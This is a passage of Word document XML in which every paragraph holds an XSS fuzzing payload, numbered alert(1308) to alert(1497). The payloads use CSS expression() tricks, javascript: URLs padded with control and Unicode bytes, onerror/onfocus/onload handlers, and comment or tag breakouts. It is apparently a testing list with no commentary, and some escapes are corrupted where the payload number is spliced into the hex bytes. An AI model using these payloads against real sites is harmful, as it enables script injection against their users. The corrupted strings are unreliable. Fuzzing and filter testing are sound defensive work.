    <w:p w14:paraId="40431D9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style="x:expression\x00(javascript:alert(1308)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D201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style="x:exp\x00ression(javascript:alert(1309)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388D33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style="x:exp\x5Cression(javascript:alert(1310)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEF10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style="x:\x0Aexpression(javascript:alert(1311)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5973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style="x:\x09expression(javascript:alert(1312)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA3081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style="x:\xE3\x80\x80expression(javascript:alert(1313)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287A36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style="x:\xE2\x80\x84expression(javascript:alert(1314)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7381B0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style="x:\xC2\xA0expression(javascript:alert(1315)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515207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style="x:\xE2\x80\x80expression(javascript:alert(1316)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E616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style="x:\xE2\x80\x8Aexpression(javascript:alert(1317)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF377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style="x:\x0Dexpression(javascript:alert(1318)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A44BA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style="x:\x0Cexpression(javascript:alert(1319)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B615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style="x:\xE2\x80\x87expression(javascript:alert(1320)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3969A4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style="x:\xEF\xBB\xBFexpression(javascript:alert(1321)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E12D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style="x:\x20expression(javascript:alert(1322)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8C9E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style="x:\xE2\x80\x88expression(javascript:alert(1323)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AB92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style="x:\x00expression(javascript:alert(1324)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1DBF6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style="x:\xE2\x80\x8Bexpression(javascript:alert(1325)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7344E8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style="x:\xE2\x80\x86expression(javascript:alert(1326)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3589EA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style="x:\xE2\x80\x85expression(javascript:alert(1327)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EF056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style="x:\xE2\x80\x82expression(javascript:alert(1328)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAF5AC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ABC&lt;div style="x:\x0Bexpression(javascript:alert(1329)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543A184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style="x:\xE2\x80\x81330expression(javascript:alert(1330)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C308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style="x:\xE2\x80\x83expression(javascript:alert(1331)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2C0D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ABC&lt;div style="x:\xE2\x80\x89expression(javascript:alert(1332)"&gt;DEF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410DA54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href="\x0Bjavascript:javascript:alert(1333)" id="fuzzelement1333"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438AC28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href="\x0Fjavascript:javascript:alert(1334)" id="fuzzelement1334"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D567D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href="\xC2\xA0javascript:javascript:alert(1335)" id="fuzzelement1335"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2049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href="\x05javascript:javascript:alert(1336)" id="fuzzelement1336"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B4D7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href="\xE1337\xA0\x8Ejavascript:javascript:alert(1337)" id="fuzzelement1337"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCA0C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href="\x13388javascript:javascript:alert(1338)" id="fuzzelement1338"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214410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href="\x13391339javascript:javascript:alert(1339)" id="fuzzelement1339"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2E23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href="\xE2\x80\x88javascript:javascript:alert(1340)" id="fuzzelement1340"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4403C8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href="\xE2\x80\x89javascript:javascript:alert(1341)" id="fuzzelement1341"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603265E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href="\xE2\x80\x80javascript:javascript:alert(1342)" id="fuzzelement1342"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087B1E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href="\x13437javascript:javascript:alert(1343)" id="fuzzelement1343"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7643D8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href="\x03javascript:javascript:alert(1344)" id="fuzzelement1344"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C87A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href="\x0Ejavascript:javascript:alert(1345)" id="fuzzelement1345"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0136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href="\x1346Ajavascript:javascript:alert(1346)" id="fuzzelement1346"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12872F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href="\x00javascript:javascript:alert(1347)" id="fuzzelement1347"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6738866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href="\x13480javascript:javascript:alert(1348)" id="fuzzelement1348"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E88BD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href="\xE2\x80\x82javascript:javascript:alert(1349)" id="fuzzelement1349"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE5B3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href="\x20javascript:javascript:alert(1350)" id="fuzzelement1350"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3127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href="\x13513javascript:javascript:alert(1351)" id="fuzzelement1351"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CA34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href="\x09javascript:javascript:alert(1352)" id="fuzzelement1352"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5542DF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href="\xE2\x80\x8Ajavascript:javascript:alert(1353)" id="fuzzelement1353"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018330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href="\x13544javascript:javascript:alert(1354)" id="fuzzelement1354"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D7EE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href="\x13559javascript:javascript:alert(1355)" id="fuzzelement1355"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E8FEB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href="\xE2\x80\xAFjavascript:javascript:alert(1356)" id="fuzzelement1356"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038041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href="\x1357Fjavascript:javascript:alert(1357)" id="fuzzelement1357"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A63885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href="\xE2\x80\x81358javascript:javascript:alert(1358)" id="fuzzelement1358"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077213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href="\x1359Djavascript:javascript:alert(1359)" id="fuzzelement1359"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E57D7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href="\xE2\x80\x87javascript:javascript:alert(1360)" id="fuzzelement1360"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE6F4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href="\x07javascript:javascript:alert(1361)" id="fuzzelement1361"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1939D99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href="\xE1362\x9A\x80javascript:javascript:alert(1362)" id="fuzzelement1362"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5D8A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href="\xE2\x80\x83javascript:javascript:alert(1363)" id="fuzzelement1363"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E94CBF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href="\x04javascript:javascript:alert(1364)" id="fuzzelement1364"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D60D3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href="\x01365javascript:javascript:alert(1365)" id="fuzzelement1365"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AE790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href="\x08javascript:javascript:alert(1366)" id="fuzzelement1366"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E668E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href="\xE2\x80\x84javascript:javascript:alert(1367)" id="fuzzelement1367"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6E5B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href="\xE2\x80\x86javascript:javascript:alert(1368)" id="fuzzelement1368"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B6E9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href="\xE3\x80\x80javascript:javascript:alert(1369)" id="fuzzelement1369"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3138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href="\x13702javascript:javascript:alert(1370)" id="fuzzelement1370"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E59D4D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href="\x0Djavascript:javascript:alert(1371)" id="fuzzelement1371"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574823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href="\x0Ajavascript:javascript:alert(1372)" id="fuzzelement1372"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057F85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&lt;a href="\x0Cjavascript:javascript:alert(1373)" id="fuzzelement1373"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083D369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href="\x13745javascript:javascript:alert(1374)" id="fuzzelement1374"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F62D6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href="\xE2\x80\xA8javascript:javascript:alert(1375)" id="fuzzelement1375"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBAA3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href="\x13766javascript:javascript:alert(1376)" id="fuzzelement1376"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C143D6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href="\x02javascript:javascript:alert(1377)" id="fuzzelement1377"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F85BE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href="\x1378Bjavascript:javascript:alert(1378)" id="fuzzelement1378"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D863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href="\x06javascript:javascript:alert(1379)" id="fuzzelement1379"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605D70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href="\xE2\x80\xA9javascript:javascript:alert(1380)" id="fuzzelement1380"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAEB2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href="\xE2\x80\x85javascript:javascript:alert(1381)" id="fuzzelement1381"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7807AA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href="\x1382Ejavascript:javascript:alert(1382)" id="fuzzelement1382"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592C51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href="\xE2\x81383\x9Fjavascript:javascript:alert(1383)" id="fuzzelement1383"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1433BF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href="\x1384Cjavascript:javascript:alert(1384)" id="fuzzelement1384"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204A92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href="javascript\x00:javascript:alert(1385)" id="fuzzelement1385"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DD2F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href="javascript\x3A:javascript:alert(1386)" id="fuzzelement1386"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B754E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href="javascript\x09:javascript:alert(1387)" id="fuzzelement1387"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3EF8F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href="javascript\x0D:javascript:alert(1388)" id="fuzzelement1388"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E141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href="javascript\x0A:javascript:alert(1389)" id="fuzzelement1389"&gt;test&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA10A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\x0Aonerror=javascript:alert(1390)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091203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\x22onerror=javascript:alert(1391)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130AE0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\x0Bonerror=javascript:alert(1392)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23579B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\x0Donerror=javascript:alert(1393)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730602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\x2Fonerror=javascript:alert(1394)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A670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\x09onerror=javascript:alert(1395)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343C8C0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\x0Conerror=javascript:alert(1396)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D424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\x00onerror=javascript:alert(1397)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128F2B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\x27onerror=javascript:alert(1398)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1984D1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\x20onerror=javascript:alert(1399)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17781CB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"`'&gt;&lt;script&gt;\x3Bjavascript:alert(1400)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F186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"`'&gt;&lt;script&gt;\x0Djavascript:alert(1401)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD3BB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"`'&gt;&lt;script&gt;\xEF\xBB\xBFjavascript:alert(1402)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED39EC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"`'&gt;&lt;script&gt;\xE2\x80\x81403javascript:alert(1403)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277E5A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"`'&gt;&lt;script&gt;\xE2\x80\x84javascript:alert(1404)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355691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"`'&gt;&lt;script&gt;\xE3\x80\x80javascript:alert(1405)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551969F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"`'&gt;&lt;script&gt;\x09javascript:alert(1406)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B04047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"`'&gt;&lt;script&gt;\xE2\x80\x89javascript:alert(1407)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742C6F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"`'&gt;&lt;script&gt;\xE2\x80\x85javascript:alert(1408)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C117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"`'&gt;&lt;script&gt;\xE2\x80\x88javascript:alert(1409)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A2B2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"`'&gt;&lt;script&gt;\x00javascript:alert(1410)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA4B9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"`'&gt;&lt;script&gt;\xE2\x80\xA8javascript:alert(1411)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337A8C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"`'&gt;&lt;script&gt;\xE2\x80\x8Ajavascript:alert(1412)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F608C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"`'&gt;&lt;script&gt;\xE1413\x9A\x80javascript:alert(1413)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EDFD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"`'&gt;&lt;script&gt;\x0Cjavascript:alert(1414)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062B93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"`'&gt;&lt;script&gt;\x2Bjavascript:alert(1415)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CF01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"`'&gt;&lt;script&gt;\xF0\x90\x96\x9Ajavascript:alert(1416)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306C83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"`'&gt;&lt;script&gt;-javascript:alert(1417)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0707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"`'&gt;&lt;script&gt;\x0Ajavascript:alert(1418)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC741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"`'&gt;&lt;script&gt;\xE2\x80\xAFjavascript:alert(1419)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D19328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"`'&gt;&lt;script&gt;\x7Ejavascript:alert(1420)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB516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"`'&gt;&lt;script&gt;\xE2\x80\x87javascript:alert(1421)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602841D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"`'&gt;&lt;script&gt;\xE2\x81422\x9Fjavascript:alert(1422)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037263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"`'&gt;&lt;script&gt;\xE2\x80\xA9javascript:alert(1423)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566E0D2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"`'&gt;&lt;script&gt;\xC2\x85javascript:alert(1424)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FC1C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"`'&gt;&lt;script&gt;\xEF\xBF\xAEjavascript:alert(1425)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DBCB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"`'&gt;&lt;script&gt;\xE2\x80\x83javascript:alert(1426)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0D88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"`'&gt;&lt;script&gt;\xE2\x80\x8Bjavascript:alert(1427)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413BC2C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"`'&gt;&lt;script&gt;\xEF\xBF\xBEjavascript:alert(1428)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CACA3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"`'&gt;&lt;script&gt;\xE2\x80\x80javascript:alert(1429)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FA60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"`'&gt;&lt;script&gt;\x21430javascript:alert(1430)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214D89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"`'&gt;&lt;script&gt;\xE2\x80\x82javascript:alert(1431)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36951C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"`'&gt;&lt;script&gt;\xE2\x80\x86javascript:alert(1432)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117541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"`'&gt;&lt;script&gt;\xE1433\xA0\x8Ejavascript:alert(1433)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6A94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"`'&gt;&lt;script&gt;\x0Bjavascript:alert(1434)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C8B3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"`'&gt;&lt;script&gt;\x20javascript:alert(1435)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F97574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"`'&gt;&lt;script&gt;\xC2\xA0javascript:alert(1436)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFCF9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"/&gt;&lt;img/onerror=\x0Bjavascript:alert(1437)\x0Bsrc=xxx:x /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FC2C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"/&gt;&lt;img/onerror=\x22javascript:alert(1438)\x22src=xxx:x /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F40CF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"/&gt;&lt;img/onerror=\x09javascript:alert(1439)\x09src=xxx:x /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347677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"/&gt;&lt;img/onerror=\x27javascript:alert(1440)\x27src=xxx:x /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCA4B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"/&gt;&lt;img/onerror=\x0Ajavascript:alert(1441)\x0Asrc=xxx:x /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB80D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"/&gt;&lt;img/onerror=\x0Cjavascript:alert(1442)\x0Csrc=xxx:x /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DF9F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"/&gt;&lt;img/onerror=\x0Djavascript:alert(1443)\x0Dsrc=xxx:x /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFA4E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"/&gt;&lt;img/onerror=\x60javascript:alert(1444)\x60src=xxx:x /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B2C99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"/&gt;&lt;img/onerror=\x20javascript:alert(1445)\x20src=xxx:x /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEC8A7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&lt;script\x2F&gt;javascript:alert(1446)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29898EB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&lt;script\x20&gt;javascript:alert(1447)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D34C9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&lt;script\x0D&gt;javascript:alert(1448)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D31E7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&lt;script\x0A&gt;javascript:alert(1449)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8252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&lt;script\x0C&gt;javascript:alert(1450)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7896875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&lt;script\x00&gt;javascript:alert(1451)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D236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&lt;script\x09&gt;javascript:alert(1452)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388FDA0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onerror=javascript:alert(1453)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AB66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onerror=javascript:alert(1454)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2779CC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onerror=javascript:alert(1455)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B801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onerror=javascript:alert(1456)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2F0A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onerror=javascript:alert(1457))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A4B2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onerror=javascript:alert(1458))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3053B9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onerror=javascript:alert(1459))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170988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onerror=javascript:alert(1460)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CAB9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"&gt;&lt;img src=x onerror=javascript:alert(1461))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7341854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onerror=javascript:alert(1462))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A3ACF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onerror=javascript:alert(1463)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292E8E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onerror=javascript:alert(1464))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2F65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onerror=javascript:alert(1465)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075232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onerror=javascript:alert(1466))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775AE7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"&gt;&lt;img src=x onerror=javascript:alert(1467)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756636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onerror\x0B=javascript:alert(1468)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D58D00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onerror\x00=javascript:alert(1469)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033216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onerror\x0C=javascript:alert(1470)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3387CB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onerror\x0D=javascript:alert(1471)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9B989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onerror\x20=javascript:alert(1472)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B398CB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onerror\x0A=javascript:alert(1473)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D7C9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`"'&gt;&lt;img src=xxx:x onerror\x09=javascript:alert(1474)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36698E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&lt;script&gt;javascript:alert(1475)&lt;\x00/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7BF2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src=# onerror\x3D"javascript:alert(1476)" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500A47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onfocus=javascript:alert(1477) autofocus&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35769A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onblur=javascript:alert(1478) autofocus&gt;&lt;input autofocus&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22078D5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poster=javascript:javascript:alert(1479)//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C54B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javascript:alert(1480)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br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A013A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id=test onforminput=javascript:alert(1481)&gt;&lt;input&gt;&lt;/form&gt;&lt;button form=test onformchange=javascript:alert(1481)&gt;X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3C50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&lt;video&gt;&lt;source onerror="javascript:javascript:alert(1482)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EB45B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&lt;video onerror="javascript:javascript:alert(1483)"&gt;&lt;source&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDEF1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formaction="javascript:javascript:alert(1484)"&gt;X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD8ECD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oninput=javascript:alert(1485)&gt;&lt;input autofocus&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70024D2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&lt;math href="javascript:javascript:alert(1486)"&gt;CLICKME&lt;/math&gt;  &lt;math&gt; &lt;maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1486)"&gt;CLICKME&lt;/maction&gt; &lt;/math&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23564CE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onload=javascript:alert(1487)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D0DFE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background="javascript:javascript:alert(1488)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282AA4A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&lt;!--&lt;img src="--&gt;&lt;img src=x onerror=javascript:alert(1489)//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FB0DD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&lt;comment&gt;&lt;img src="&lt;/comment&gt;&lt;img src=x onerror=javascript:alert(1490))//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684F62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&lt;![&gt;&lt;img src="]&gt;&lt;img src=x onerror=javascript:alert(1491)//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487252B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&lt;style&gt;&lt;img src="&lt;/style&gt;&lt;img src=x onerror=javascript:alert(1492)//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DCDC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 style=list-style:url() onerror=javascript:alert(1493)&gt; &lt;div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1493)&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FE2B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&lt;head&gt;&lt;base href="javascript://"&gt;&lt;/head&gt;&lt;body&gt;&lt;a href="/. /,javascript:alert(1494)//#"&gt;XXX&lt;/a&gt;&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD03B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&lt;SCRIPT FOR=document EVENT=onreadystatechange&gt;javascript:alert(1495)&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B88B55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CLASSID="clsid:333C7BC4-460F-14961496D0-BC04-0080C7055A83"&gt;&lt;PARAM NAME="DataURL" VALUE="javascript:alert(1496)"&gt;&lt;/OBJECT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A171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 &lt;script&gt;alert(1497)&lt;/script&gt;0</w:t>
      </w:r>
    </w:p>
